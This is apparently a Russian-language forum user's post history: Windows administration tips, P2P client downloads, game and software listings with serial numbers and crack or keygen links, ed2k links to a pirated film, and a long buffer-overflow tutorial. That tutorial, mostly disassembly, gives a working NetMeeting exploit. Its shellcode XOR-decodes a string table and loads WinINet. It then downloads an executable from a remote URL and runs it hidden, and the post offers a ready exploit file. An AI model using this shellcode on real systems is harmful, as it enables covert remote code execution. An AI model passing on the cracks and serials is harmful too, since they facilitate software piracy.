-
Posts
2,178 -
Joined
-
Last visited
-
Days Won
1
Content Type
Events
Profiles
Forums
Gallery
Everything posted by SUNUN
-
Как спрятать имя пользователя из Welcome Screen? Это может пригодится, например, когда на компьютере прописан пользователь, который никогда не логинится локально, только по сети. Для того что бы убрать пользователя из списка доступных пользователей нужно в реестре по адресу HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList\\\\ добавить ключ типа REG_DWORD соответствующий имени пользователя. Присвоив этому ключу значение 1 мы разрешим показывать этого пользователя в Welcome Screen, а 0 запретим. Несмотря на то что пользователя не видно, им всё равно можно залогиниться. Для этого дважды нажимаем Crtl+Alt+Del, открывается классическое окно логона, вводим имя, пароль, и логинимся
-
Как настроить IPv6 под ХР? В XP уже встроена поддержка этого протокола, но она нигде не отражена в интерфейсе. Для его установки IPv6 достаточно набрать в командной строке install ipv6. Не переживайте, на текущие настройки TCP/IP это не окажет никакого влияния. Настройка IPv6 производится из командной строки, что бы узнать про это подробнее, просто введите ipv6 /?
-
Способ установки Windows NT при проблеме на стадии детектирования оборудования Если установка останавливается на стадии "detecting the hardware" (детектирования оборудования), то можно попробовать использовать DEBUG-версию программы NTDETECT.COM. В папке SUPPORT на CD с дистрибутивом Windows NT находится файл NTDETECT.CHK, для его применения следуйте инструкции: 1. С помощью команды Diskcopy создайте копию первого инсталляционного диска: diskcopy a: a: /v 2. Скопируйте NTDETECT.CHK из папки SUPPORT дистрибутива на созданный диск: copy d:\support\ntdetect.chk a:ntdetect.com 3. Запустите установку с нового диска — процесс обнаружения оборудования будет выводиться на экран (сразу будет ясно, где грабли...)
-
Форматирование первого раздела диска при сохранении Windows 2000, установленной на другом разделе. Если требуется отформатировать первый раздел диска, не потеряв возможность загрузки Windows 2000, установленной на другом разделе, то поступить следует так. Перед форматированием сохраните файлы из корневого каталога первого раздела, нужные для загрузки Windows 2000: ntldr — загрузчик boot.ini — конфигурационный файл загрузчика ntdetect.com — собирает информацию об устройствах ntbootdd.sys — нужен только при наличии SCSI bootfont.bin — шрифт, нужен только для локализованной версии bootsect.dos — файл с загрузочным сектором альтернативной ОС. После форматирования раздела скопируйте все эти файлы обратно, загрузитесь в Recovery Console Windows 2000 и восстановите загрузочный сектор Windows 2000 командой fixboot.
-
WinTools.NET Professional 3.7.1 Набор инструментов, предназначенный для повышения производительности операционной системы MS Windows и поддержания производительности на высоком уровне на протяжении всего эксплуатационного периода. В состав программы входят следующие инструменты: 'Clean Uninstaller', 'Scan Files', 'Scan Registry', 'Start Up Manager', 'Tweak UI', 'Net Tweaker', 'The Privacy'... Cкачать>>> http://www.wintools.net/wintoolspro.zip Лечив>>> http://wmw.andr.net/andr-crack/w/o-wnp371.zip
-
Клиенты (P2P) Клиенты так называемых Peer To Peer (P2P) сетей (или как их еще называют сети расшареных ресурсов - File Sharing). Данные сети используются для обмена разного рода файлами между пользователями. Самой главной фишкой этих сетейr является тот факт, что центральный сервер отсутствует как класс, то есть его просто нет. Благодаря этому в сети никогда не бывает, каких бы то ни было неприятностей связанных с перебоями в работе сервера, так как если возникает необходимость программа переключается с одного на другой сервер. Что касается самого обмена файлами, то тут все очень просто - пользователи расшаривают ресурсы своего компьютера для вас, а в он-лайне постоянно тысячи пользователей со всего мира, и вы обязательно найдете интересующую вас информацию. Список пользователей готовых предоставить вам свое богатство можно сортировать по различным параметрам от названия и расширения файла, до скорости соединения этого человека с сетью. Естественно в сетях такого рода есть и поиск. На данный момент самой популярной сетью является KaZaA (Fast Track), второе место по популярности занимает eDonkey2000 (Overnet), третье Gnutella. Замечу, что нелишним будет использование сразу нескольких сетей - больше вероятность нахождения нужного вам файла. Внимание для скачки Фильмов из раздела Фильми & Games вы должны скачат одну из этих програм! eDonkey2000 0.52 Клиент для сети eDonkey2000 (Overnet). Скачать (1.3 MB)>>> http://download.overnet.com/edonkey0.52.exe eMule 0.30e Клиент для сети eDonkey2000 (Overnet). Скачать (4.4 MB)>>> http://heanet.dl.sourceforge.net/sourcefor...e-Installer.exe eMule Plus 1i Клиент для сети eDonkey2000 (Overnet). Скачать (2.5 MB)>>> http://cesnet.dl.sourceforge.net/sourcefor...i.Installer.exe KaZaA Media Desktop 2.6 Клиент для сети KaZaA (Fast track). Скачать (432 KB)>>> http://download.kazaa.com/beta/kmd.exe Kazaa Lite K++ 2.4.3 Клиент для сети KaZaA (Fast track). Скачать (3.3 MB)>>> http://ge8.edskes.com/klitekpp243e.exe Morpheus 4.0 Клиент для сети Gnutella. Скачать (web install) (78 KB)>>> http://downloads.morpheus.com/morpheus/Morpheus40beta.exe BearShare 4.3.0 Final Клиент для сети Gnutella. Скачать (2.1 MB)>>> http://download.bearshare.com/BSINSTALL.exe LimeWire Basic 3.6.10 Клиент для сети Gnutella. Скачать (4.7 MB)>>> http://www9.limewire.com/beta/LimeWireWin.exe WinMX 3.31 Клиент для сети WinMX Peer Network. Скачать (752 KB)>>> http://dld25.winmx.com/281553512/winmx331.exe Soulseek 152 Клиент для сети Soulseek. Скачать (743 KB)>>> http://www.slsknet.org/slsk152.exe DC++ 0.305 Клиент для сети Direct Connect. Скачать (2 MB)>>> http://unc.dl.sourceforge.net/sourceforge/...sPlus-0.305.exe Shareaza 1.8.10.4 RC Клиент для сетей eDonkey2000, Gnutella, BitTorrent и Gnutella2 (G2) Скачать (2.7 MB>>> http://www.kiwiuk.net/shareaza/Shareaza18A4.exe
-
Shenyatci jan что стало с Чемпионатом нарди? Я уже В разделе Games опубликовал программу для игры!
-
Hot Chix 'n' Gear Stix http://downloads.smallrockets.com/download...ix-demo-v01.exe Name: Monat Laplu Code: 6-6VXF-2VP4-HHZQ
-
Beetle Ju 1.7 http://www.alawar.com/BeetleJu.exe S/N: 0OeE4nCIsA6hdccVwZsCXhDwpgdHzVovHT eumZwz0zW8MTvkwgmb0Cn8u5nCXrYPlKOpLmu e9YoDUTvCpTBcUVMv0vne3zsr7bfF6gVTQEXAZ 3jYRtlwmUnpSl1xThWglqKR+DRF0krL2MJttVkNA OC9YdZ0TI9sZRqkcQRVgOTM=
-
Kyodai Mahjongg 19.99 http://bvn.games.tucows.com/files/kyodai.exe Name: downloadall Serial: 81098987756
-
Congo Cube (full) action puzzle game http://www.angelfire.com/mech/1ladyjade/mies/congocube.exe
-
Bomberman vs Digger v2.07 офсайт http://www.divogames.com/ скачать http://www.divogames.com/bomberman/bombervsd_setup.exe лечив http://www.hackersrussia.ru/Cells/filez/cr...racked-tsrh.zip
-
MoneyMania v.1.51 http://www.axysoft.com/moneymania/MoneyMania.exe лечив http://home.peterstar.ru/userdef/filez/axy...1_35_Keygen.rar
-
AirXonix v.1.36 http://www.axysoft.com/airxonix/AirXonix.exe лечив http://home.peterstar.ru/userdef/filez/axy...xKeygen1_36.exe
-
AxySnake v.1.15 змейка в 3d http://www.axysoft.com/axysnake/AxySnake.exe Лечив http://home.peterstar.ru/userdef/filez/axy...eKeygen1_15.exe
-
Alonix v.2.5 http://www.axysoft.com/alonix/Alonix.exe Лечив http://home.peterstar.ru/userdef/filez/axy...eygen2_5su3.exe
-
Microsoft Virtual PC 2004 Virtual PC - это мощная программа, которая позволяет эмулировать на одном компьютере работу сразу нескольких виртуальных машин. В своих кругах, эта программа будет просто не заменима ! Virtual PC is a powerful software virtualization solution that allows you to run multiple PC-based operating systems simultaneously on one workstation, providing a safety net to maintain compatibility with legacy applications while you migrate to a new operating system. It also saves reconfiguration time, so your support, development, and training staff can work more efficiently. Microsoft released Microsoft Virtual PC 2004 on December 2, 2003. [Скачать / Download - Microsoft Virtual PC 2004]>>> http://download.pods.lv/VirtualPC/Microsof...2004English.rar Лечив - Microsoft Virtual PC 2004]>>> http://www.iskushenie.ru/modules.php?name=...p=getit&lid=392 * - При нажатии ссылки на программу, возникнет промежуточное окно, с ссылкой перейти (Do NOT leech files! GO TO ...), этого делать не надо. Подводим курсор к ссылки страницы в вашем браузере и нажимаем “enter” – происходит обновление окна и фаил качается. Вес файла ~19 метров.
-
Zealot All Video Splitter v1.0.6 Zealot All Video Splitter - очень неплохой видеоредактор, позволяющий разрезать большой AVI, MPEG или ASF файл на более мелкие части или клипы. Программа включает также свой Media Player! All Video Splitter не требует никакого технического опыта и потому она очень удобна. All Video Splitter can help you split , cut or trim a large AVI, MPEG, ASF or WMV file into smaller video clips. Using the included video player, you can easily cut AVI, MPEG, ASF or WMV file by time or the selection as needed. The program does not require any technical experience and is very easy to use. Минимальные требования: [-] Windows 98/ME/NT/2000 or Windows XP. [-] MFC runtime DLLs. [-] DirectX runtime. [-] Window Media Format runtime. [Скачать / Download - Zealot All Video Splitter v1.0.6 - 2.1 MB]>>> http://www.zealotsoft.net/download/allsplitter.exe Лечив - Zealot All Video Splitter v1.0.6]>>> http://www.hot.ee/vanixrelase/alls.rar
-
Зловещее предупреждение /Silent Warnings/ (2003) Название: Зловещее предупреждение Оригинальное название: Silent Warnings Год выхода: 2003 Жанр: Фантастика, Ужасы, Триллер Выпущено: Unified Film Organization Режиссер: Кристиан МакИнтайр /Christian McIntire/ В ролях: Стивен Болдуин /Stephen Baldwin/, Билли Зейн /Billy Zane/, А.Дж. Бакли /A.J. Buckley/, Калли Де Фабрай /Callie De Fabry/, Девид О'Доннел /David O'Donnell/, Мишель Борт /Michelle Borth/ О фильме: В небольшом городишке в штате Орегон происходят странные вещи - на кукурузном поле фермера Джо Воссимера появляются таинственные круги. Когда Джо с приятелями и шерифом Уиллингэмом оказываются возле потусторонних знаков, то начинают испытывать необъяснимый ужас, ранее им неведомый. Теперь героям предстоит сделать все, чтобы избежать роковых последствий необъяснимого послания, после того, как они сделали страшное открытие: странные круги - не просто знаки, а зловещее предупреждение! Продолжительность: 1:23 Язык: Русский профессиональный перевод Видео: 704x384; 23.976 fps; 1823 Кбит/с; DivX 5.0.5 Звук: 48kHz; dolby surround; AC3, 448 kbit/s Примечания: Ты узнаешь, что такое страх! Размер: 674+678 Мб [Скачать / Download - Silent Warnings 1 of 2 (DVDRip, DivX, Rus).avi]>>> ed2k://|file|zloveshie.preduprezhdenia.1.of.2.(rus).ripper.sharereactor.ru.avi|70735257 6|664017a620bb204ba7f551cdb43634f8|/ [Скачать / Download - Silent Warnings 2 of 2 (DVDRip, DivX, Rus).avi]>>> ed2k://|file|zloveshie.preduprezhdenia.2.of.2.(rus).ripper.sharereactor.ru.avi|71113113 6|30c3839ed07a2d6048608cd845c560a1|/
-
Организация загрузки некольких операционных систем с помощью загрузчика Windows 2000 С помощью загрузчика Windows 2000 можно организовать загрузку и более двух ОС. Для этого надо получить загрузочные сектора дополнительных операционных систем в виде файлов и прописать их в boot.ini, например, так: C:\bootsect.dos="Windows 98" C:\bootsect.lnx="Linux"
-
Установка Windows 2000/XP и Windows 9x на одном компьютере Если вы хотите установить на компьютер Windows 9x и Windows 2000/XP, то следует сначала установить Windows 9x, а затем из-под неё запустить setup.exe из дистрибутива Windows 2000/XP и выполнить установку в другой каталог, а лучше на другой раздел, иначе, например, Outlook Express и Internet Explorer нормально работать в Windows 9x не будут. После этого при загрузке компьютера у вас будет появляться меню выбора операционной системы. Если устанавливать в обратном порядке, то Windows 9x при инсталляции затирает загрузочный сектор Windows 2000/XP. Однако эту проблему можно решить. Перед установкой Windows 9x нужно в файле MSBATCH.INF из дистрибутива (если такого файла в вашем дистрибутиве нет, создайте его) прописать следующие строки: [setup] CleanBoot=0 Если дистрибутив Windows 9x находится на CD (как это обычно и бывает), то скопируйте (или создайте) MSBATCH.INF на винчестер и отредактируйте там, а затем запустите программу установки Windows 9x, указав в качестве параметра полный путь к данному файлу, например: setup.exe C:\MSBATCH.INF В данном случае файл можно назвать как угодно, а не только MSBATCH.INF. После установки может понадобиться прописать Windows 9x в стартовом меню Windows 2000/XP, добавив следующую строку в раздел [operating systems] файла boot.ini: C:\="Microsoft Windows 98" где текст в кавычках — это то, что будет выводиться в загрузочном меню выбора ОС. В корне системного диска необходим файлик bootsect.dos, который содержит загрузочный сектор Windows 9x. Если этот файл по какой-то причине не создался, то придётся пойти другим путём. 1. Устанавливаем Windows 9x в нормальном режиме, чтобы она перезаписала загрузочный сектор. 2. Сохраняем его (первый сектор раздела (512 байт), на котором установили Windows 9x) в файл под именем bootsect.dos с помощью Norton DiskEdit или, например, программы BOOTPART. 3. Загружаемся в программу инсталляции Windows 2000/XP, выбираем там ремонтировать текущую инсталляцию с помощью Recovery Console. 4. Восстанавливаем загрузочный сектор Windows 2000/XP командой fixboot. 5. Загружаемся в Windows 2000/XP и прописываем Windows 9x в стартовое меню в boot.ini
-
Установка Windows NT из-под Windows 9x Если Вы хотите установить Windows NT при установленной Windows 95, то запустите DOS-сессию (command.com) и дайте команду LOCK. Это включит прямой доступ к диску, который нужен для программы установки NT. Также нужно помнить, что в этом случае надо запускать winnt.exe, а не winnt32.
-
Как удалить XP с диска без потери данных? Hадо вернуться на Win9x. Если XP стоял на NTFS, сначала нужно cконвертировать диск в FAT32. Для этого можно воспользоваться программой Partition Magic фирмы Power Quest. Затем создаем загрузочную дискету нужной версии Win9x, копируем на неё файлы fdisk.com, sys.com и загружаемся с неё. Выполняем команды fdisk /mbr и sys a: c: После этого удаляем директорию /Windows и файлы из корневого каталога, имеющие отношение к XP - ntldr, boot.ini и т.д
-
Переполнение буфера ПЕРЕПОЛНЕНИЕ БУФЕРА WIN32: БЕСПРЕДЕЛ Во все времена наши операционные системы страдали от ошибок Неосведомлённый мир Повернулся к Windows для безопасности от себя самих Но пришло время показать миру что мы все равны Использование переполнения буфера требует внимания, знаний, навыка и воображения. Мы не можем научить Вас всему вышеперечисленному. Но мы можем рассказать технологию построения собственных эксплоитов для переполнения буфера в windows 95,98,NT и 2000. Мы ставим своей целью скачать с сервера и запустить у жертвы какой-либо файл по нашему усмотрению без её ведома. Данный документ потребует от вас знакомства с -архитектурой процессоров x86, предпочтительно Pentium. -базовой архитектурой Windows (вы должны знать принцип построения формата PE-Exetuable. -Знать, что такое URL. -Иметь представление о языке C Так же вам потребуются следующие инструменты: Шестнадцатеричный редактор/просмотрищик кода, такой, как HIEW. Отладчик реального времени SoftIce. Некоторые из инструментов, поставляемых с Visual C++, например, Dumpenv. ОСНОВЫ Переполнение буфера возникнет, если что-то очень большое будет помещено в переменную меньше, чем необходимо. То, что не попало в переменную, попадёт в предсказуемое место памяти. Пример кода: void func(void) { int i; char buffer[256]; // * for(i=0;i>> В этом случае у Вас есть гораздо больше места для размещения Вашего собственного исполняемого кода. Как точно узнатьновое значение EIP, указывающее на ваш код? Берите в руки SoftICE, запускайте из-под него программу, которую ломаете и передайте ей строку, ведущую к переполнению. После сбоя вы увидите, что ESP (stack pointer) - единственный регистр, который показывает на адрес близкий к адресу нашего кода. Фактически, он указывает на адрес, где мы вышли за пределы положенного нам размера - EBP + 16 байт. Хорошо... что же мы будем делать? Нам надо перепрыгнуть через область, занятую стеком. То есть, как правило, будет достаточно перехода по адесу ESP. Более правильный путь - установить 0xZZYYXXWW в точку кода, где есть команда jmp esp или же call esp или что-то подобное. Но. в результате издержек компиляции, такая точка может оказаться в области, недоступной процессу, с бессмысленными адресами типа 0x00. Но, при анализе MSCONF32.DLL мы обнаружили наш код в сегменте 0x6A600000 смещение 2А76: .00002A76: 54 push esp .00002A77: 2404 and al,004 .00002A79: 33C0 xor eax,eax .00002A7B: 8A0A mov cl,[edx] .00002A7D: 84C9 test cl,cl .00002A7F: 740F je .000002A90 .00002A81: 80E930 sub cl,030 ;"0" .00002A84: 8D0480 lea eax,[eax][eax]*4 .00002A87: 0FB6C9 movzx ecx,cl .00002A8A: 42 inc edx .00002A8B: 8D0441 lea eax,[ecx][eax]*2 .00002A8E: EBEB jmps .000002A7B .00002A90: C20400 retn 00004 Непохоже, чтобы код начинался с jmp esp. Он возвращается к ESP. Выполняется PUSH ESP, затем JMPS 2A7B, поле этого переход JE 2A90 возвращает нас к RET'у. MSCONF.DLL загружен, он представлен одной версией для всех систем - соответственно адрес, куда на который мы передадим управление - 0x6A602A76. В этой строке нет ни нулей, ни возвратов каретки. Отлично. Мы переставили EIP. Процессор под нашим контролем. Пришло время рассказать о том, как мы будем строить код эксплоита, выполняемый после переполнения буфера. Можно заметить, что нам надо втиснуть всё в 763 байта, иначе сбой произойдёт в другом месте и код не исполнится. Это так же переполнение, но немного другое ;-) - у нас даже целых два бага для исследования. Первые 256 символов отбрасываются. Итак у нас есть 500 байт для нашего кода и неизвестная версия Windows. Так же нам неизвестны адреса функций API в NSCONF.DLL. Но для этого существует очень полезная процедура GetProcAddress. Мы найдём адрес этой процедуры, используя DUMPENV, поставляющийся вместе с VC++. Microsoft ® COFF Binary File Dumper Version 5.10.7303 Copyright © Microsoft Corp 1992-1997. All rights reserved. Dump of file msconf.dll File Type: DLL Section contains the following imports: KERNEL32.dll 23F Sleep 183 IsBadReadPtr 17E InterlockedIncrement . . . 1E CompareStringA 98 FreeLibrary 116 GetProcAddress 190 LoadLibraryA 4C DeleteCriticalSection 51 DisableThreadLibraryCalls . . . То, что надо ! GetProcAddress и LoadLibraryA. С помощью этих функций мы можем подгружать необходимые модули. Так же функции возвращают базовый адрес подгружаемого модуля. Итак, запускаем SoftIce и ищем адреса данных функций. Они будут 0x6A60107C (LoadLibraryA), и 0x6A601078 (GetProcAddress). Всё, что нам надо = вызвать их, используя неявный вызов (call dword ptr [0x6A60107C]) они сработают так, как надо нам. Теперь, чтобы сделать эксплоит как можно более маленьким в размере, нам надо -Знать таблицу функций, которые мы будем использовать -Запустить код, работающий с этой таблицей Это сильно уменьшит размер кода и минимизирует размер используемого стека. Это важно, поскольку если использовать чересчур много PUSH или POP, мы спаровоцируем ошибку в своём эксплоите или же создадим дополнительные проблемы со стеком. А чтобы построить таблицу адресов функций, надо наперёд знать, что мы будем использовать. Вообще, нам требуется заставить нашу маленькую програмку скачать и запустить нечно большее ;-) bo server или netbus, например. Кстати, подобным способом работал широко известный эксплоит от eeye. Чтобы загрузить URL, нам понадобятся функции InternetOpenA, InternetCloseHandle, InternetOpenUrlA, и InternetReadFile из библиотеки WININET.DLL. Так же понадобятся _lcreat, _lwrite, и _lclose из KERNEL32.DLL, чтобы записать на диск загруженный файл. GlobalAlloc понадобится, чтобы выделить место для загружаемого потока данных. WinExec и ExitProcess будут нужны, чтобы исполнить и завершить то, что наш эксплоит скачает с известного адреса и прибить RUNDLL32 до того, как он пикнет об ужасных вещах ;-). Заметьте, что в обычной порграмме под Win32 Вы никогда не встретите вызова _lcreat и прочих устаревших функций. Но, тем не менее, они существуют и никуда не делись даже из Windows 2000. СОЗДАНИЕ ТАБЛИЦЫ АДРЕСОВ ФУНКЦИЙ Нам требуется обратится к фунцкиям по имени. GetProcAddress обращается к вызываемой функции либо по номеру, либо по имени. Оканчивающемуся NULL'om. Но..увы, нам невозможно иметь нулевые байты в нашем эксплоите. Но...путём простейшего применения XOR'a или ADD'a ко всем байтам эксплоита, можно добиться отсутствия в нём досадных нулей. При его запуске, естественно, происходит обратная процедура. Так же этио всё-же мало-мальская шифровка - невооружённый глаз пьяного администратора не углядит ничего подозрительного в сторке кода. Всё же это не шифровка в обычном смысле этого слова - мы пытаемся заставить эксплоит работать... 00000270: .. .. .. .. .. .. .. 4B-45 52 4E 45-4C 33 32 00 KERNEL32 00000280: 5F 6C 63 72-65 61 74 00-5F 6C 77 72-69 74 65 00 _lcreat _lwrite 00000290: 5F 6C 63 6C-6F 73 65 00-57 69 6E 45-78 65 63 00 _lclose WinExec 000002A0: 45 78 69 74-50 72 6F 63-65 73 73 00-47 6C 6F 62 ExitProcess Glob 000002B0: 61 6C 41 6C-6C 6F 63 00-57 49 4E 49-4E 45 54 00 alAlloc WININET 000002C0: 49 6E 74 65-72 6E 65 74-4F 70 65 6E-41 00 49 6E InternetOpenA In 000002D0: 74 65 72 6E-65 74 43 6C-6F 73 65 48-61 6E 64 6C ternetCloseHandl 000002E0: 65 00 49 6E-74 65 72 6E-65 74 4F 70-65 6E 55 72 e InternetOpenUr 000002F0: 6C 41 00 49-6E 74 65 72-6E 65 74 52-65 61 64 46 lA InternetReadF 00000300: 69 6C 65 00-68 74 74 70-3A 2F 2F 77-77 77 2E 6C ile http://www.l 00000310: 30 70 68 74-2E 63 6F 6D-2F 7E 64 69-6C 64 6F 67 0pht.com/~dildog 00000320: 2F 65 61 74-6D 65 2E 65-78 65 00 .. .. .. .. .. /eatme.exe XOR'им всё это по 0x80, чтобы избавиться от нулевых байтов: 00000270: .. .. .. .. .. .. .. CB-C5 D2 CE C5-CC B3 B2 80 -+-++¦¦_З 00000280: DF EC E3 F2-E5 E1 F4 80-DF EC F7 F2-E9 F4 E5 80 __¶__Я_З_______З 00000290: DF EC E3 EC-EF F3 E5 80-D7 E9 EE C5-F8 E5 E3 80 __¶____З+__+°_¶З 000002A0: C5 F8 E9 F4-D0 F2 EF E3-E5 F3 F3 80-C7 EC EF E2 +°__-__¶___З¦___ 000002B0: E1 EC C1 EC-EC EF E3 80-D7 C9 CE C9-CE C5 D4 80 Я_-___¶З+++++++З 000002C0: C9 EE F4 E5-F2 EE E5 F4-CF F0 E5 EE-C1 80 C9 EE +_______-___-З+_ 000002D0: F4 E5 F2 EE-E5 F4 C3 EC-EF F3 E5 C8-E1 EE E4 EC ______+____+Я___ 000002E0: E5 80 C9 EE-F4 E5 F2 EE-E5 F4 CF F0-E5 EE D5 F2 _З+_______-___+_ 000002F0: EC C1 80 C9-EE F4 E5 F2-EE E5 F4 D2-E5 E1 E4 C6 _-З+_______-_Я_¦ 00000300: E9 EC E5 80-E8 F4 F4 F0-BA AF AF F7-F7 F7 AE EC ___З____¦»»___«_ 00000310: B0 F0 E8 F4-AE E3 EF ED-AF FE E4 E9-EC E4 EF E7 ____«¶__»_______ 00000320: AF E5 E1 F4-ED E5 AE E5-F8 E5 80 .. .. .. .. .. »_Я___ Итак, первая задача после успешного пуска - раскодировать всё это: 00000146: 33C9 xor ecx,ecx; обнулить ecx 00000148: B88053FF63 mov eax,063FF5380 ;"c_SЗ" 0000014D: 2C80 sub al,080 ;"З" 0000014F: C1C018 rol eax,018 Устаноить EAX на конец наших данных в памяти. 00000152: B1B4 mov cl,0B4 ;"¦" ECX установлен в 0x000000B4, количество байт, которые будем XORить. 00000154: 48 dec eax 00000155: 803080 xor b,[eax],080 ;"З" 00000158: E2FA loop 000000154 ---------- (1) Это и есть цикл, раскодируюий наши данные. УСТАНОВКА ТАБЛИЦЫ ФУНКЦИЙ 0000015A: BE7C10606A mov esi,06A60107C 0000015F: 50 push eax 00000160: 50 push eax 00000161: FF16 call d,[esi] 00000163: 8BF0 mov esi,eax Этот код вызывает LoadModule. EAX есть первый аргумент этой функции, который указывает на строку "KERNEL32", После отработки LoadModule, в EAX будет хэндл модуля ядра, который мы сохраняем в ESI, чтобы он не был затёрт другими процедурами. 00000165: 5B pop ebx 00000166: 8BFB mov edi,ebx 00000168: 6681EF4BFF sub di,0FF4B ;"_K" Этот код установит EDI в начало нашей таблицы, которая начинается через 181 байт после начал таблицы строк, раскодированной нами ранее. 0000016D: FC cld 0000016E: 33C9 xor ecx,ecx 00000170: 80E9FA sub cl,-006 Мы собираемся запустить цикл 6 раз, чтоб вызвать по очереди все нужные нам процедуры. Устанавливаем счётчик ( ECX ) в 6. 00000173: 43 inc ebx 00000174: 32C0 xor al,al 00000176: D7 xlat 00000177: 84C0 test al,al 00000179: 75F8 jne 000000173 ---------- (1) 0000017B: 43 inc ebx Этот цикл проверяет текст на нули (другими словами, вычленяя из него отдельные строки - имена функций), и устанавливает EBX на адрес символа, идущего после нулевого байта. Это перемещает нас от одного имети процедуры к другому. Обратите внимание на рациональное ( 31337ное ) использование xlat'a - вся ссылка на область памяти в одном байте ;-). 0000017C: 51 push ecx 0000017D: 53 push ebx 0000017E: 56 push esi 0000017F: FF157810606A call d,[06A601078] 00000185: AB stosd 00000186: 59 pop ecx Этот код возвращает адреса функций и пишет их в EDI. 00000187: E2EA loop 000000173 ---------- (2) Итак, это конец цикла процедуры определения адресов функций из ядра. Теперь проделаем то же самое для модуля WININET: 00000189: 43 inc ebx 0000018A: 32C0 xor al,al 0000018C: D7 xlat 0000018D: 84C0 test al,al 0000018F: 75F8 jne 000000189 ---------- (2) 00000191: 43 inc ebx Сдвигаем указатель на имя библиотеки с строке WININET 00000192: 53 push ebx 00000193: 53 push ebx 00000194: FF157C10606A call d,[06A60107C] 0000019A: 8BF0 mov esi,eax 0000019C: 90 nop 0000019D: 90 nop 0000019E: 90 nop 0000019F: 90 nop Этот код пишет хэндл WININET'a в ESI. NOPы остались после отладки. 000001A0: 33C9 xor ecx,ecx 000001A2: 83E9FC sub ecx,-004 000001A5: 43 inc ebx 000001A6: 32C0 xor al,al 000001A8: D7 xlat 000001A9: 84C0 test al,al 000001AB: 75F8 jne 0000001A5 000001AD: 43 inc ebx 000001AE: 51 push ecx 000001AF: 53 push ebx 000001B0: 56 push esi 000001B1: FF157810606A call d,[06A601078] 000001B7: AB stosd 000001B8: 59 pop ecx 000001B9: E2EA loop 0000001A5 Всё ! Таблица адресов функций построена ! Мы можем вызывать их, когда захотим ;-) Теперь напишем собственно процедуру скачки файла и его запуска. 000001BB: 90 nop 000001BC: 90 nop 000001BD: 33C0 xor eax,eax 000001BF: 6648 dec ax 000001C1: D1E0 shl eax,1 000001C3: 33D2 xor edx,edx 000001C5: 50 push eax 000001C6: 52 push edx 000001C7: FF57EC call d,[edi][-0014] 000001CA: 8BF0 mov esi,eax Выделяем 131070 байт памяти. Количество требуемых байт в EAX, и затем мы вызываем неявно функцию GlobalAlloc, адрес которой берём из построенной таблицы. Адрес начала выделенной нам области хранится теперь в ESI. 000001CC: 33D2 xor edx,edx 000001CE: 52 push edx 000001CF: 52 push edx 000001D0: 52 push edx 000001D1: 52 push edx 000001D2: 57 push edi 000001D3: FF57F0 call d,[edi][-0010] Создаём хэндл Internet, вызывая функцию InternetOpenA. Передаваемые параметры - нули, о них можно не беспокоиться. Сам хэндл будет возвращён нам в EAX, и мы передадим его нашеё следующей функции. 000001D6: 33D2 xor edx,edx 000001D8: 52 push edx 000001D9: 52 push edx 000001DA: 52 push edx 000001DB: 90 nop 000001DC: 52 push edx 000001DD: 8BD7 mov edx,edi 000001DF: 83EA50 sub edx,050 ;"P" 000001E2: 90 nop 000001E3: 90 nop 000001E4: 90 nop 000001E5: 52 push edx 000001E6: 50 push eax 000001E7: FF57F8 call d,[edi][-0008] Этот код вызовет InternetOpenUrlA (по таблице [EDI-0x08]), открывая наш URL... тип - какой угодно, HTTP, FTP, FILE, GOPHER... 000001EA: 57 push edi 000001EB: 33D2 xor edx,edx 000001ED: 664A dec dx 000001EF: D1E2 shl edx,1 000001F1: 52 push edx 000001F2: 56 push esi 000001F3: 50 push eax 000001F4: FF57FC call d,[edi][-0004] Запускаем InternetReadFile (по таблице - [EDI-0x04]), и загружаем наши 131070 байт в буфер на начало которого указывает ESI (1331070 байт). Но сначала мы сохранили в стеке EDI. Мы используем его как счётчик скачанных байт. Это поможет нам при проверке - всё ли удачно мы слили с сайта ? 000001F7: 90 nop 000001F8: 90 nop 000001F9: 90 nop 000001FA: 33D2 xor edx,edx 000001FC: 52 push edx 000001FD: 8BD7 mov edx,edi 000001FF: 83EA30 sub edx,030 ;"0" 00000202: 42 inc edx 00000203: 90 nop 00000204: 90 nop 00000205: 52 push edx 00000206: FF57D8 call d,[edi][-0028] Вызвали _lcreat (по адресу в таблице [edi-0x28]), чтобы переписать скачанный буфер в файл. Файл создаётся в директории, которая является текущей для юзера (в нашем случае - файл e.exe создастся в папке SpeedDial Netmeeting'a). 00000209: FF37 push d,[edi] 0000020B: 56 push esi 0000020C: 50 push eax 0000020D: 8BD8 mov ebx,eax 0000020F: FF57DC call d,[edi][-0024] Вызов _lwrite (адрес из таблицы [edi-0x24]). Параметр - сколько байт записать на диск. Файл создан - осталось его закрыть. 00000212: 53 push ebx 00000213: FF57E0 call d,[edi][-0020] Закрыли. Лайнер готов, подан трап и контроль позади... 00000216: 90 nop 00000217: 90 nop 00000218: 90 nop 00000219: 33D2 xor edx,edx 0000021B: 42 inc edx 0000021C: 52 push edx 0000021D: 8BD7 mov edx,edi 0000021F: 83EA30 sub edx,030 ;"0" 00000222: 42 inc edx 00000223: 90 nop 00000224: 90 nop 00000225: 52 push edx 00000226: FF57E4 call d,[edi][-001C] Вызвали WinExec, указав ему исполнить файл. Заметьте - первый inc edx предназначен, чтобы определить, будет ли показано окно (SW_SHOWNORMAL) или же не будет (SW_HIDE). Вы выбираем второй вариант. А первый параметр функции - имя файла. 00000229: 90 nop 0000022A: 90 nop 0000022B: 90 nop 0000022C: FF57E8 call d,[edi][-0018] ПУСК! Наш процесс заработал ! Итак, мы вкратце пояснили принципы действия overflow-эксплоитов для windows всех версий и привели рабочий код эксплоита для Microsoft NetMeeting. Кстати, подобным образом работал и overflow-эксплоит от eeye. А для совсем ленивых - готовый файлик exploit.cnf, содержащий вышепоказанный код. Работайте, смотрите, учитесь.
-
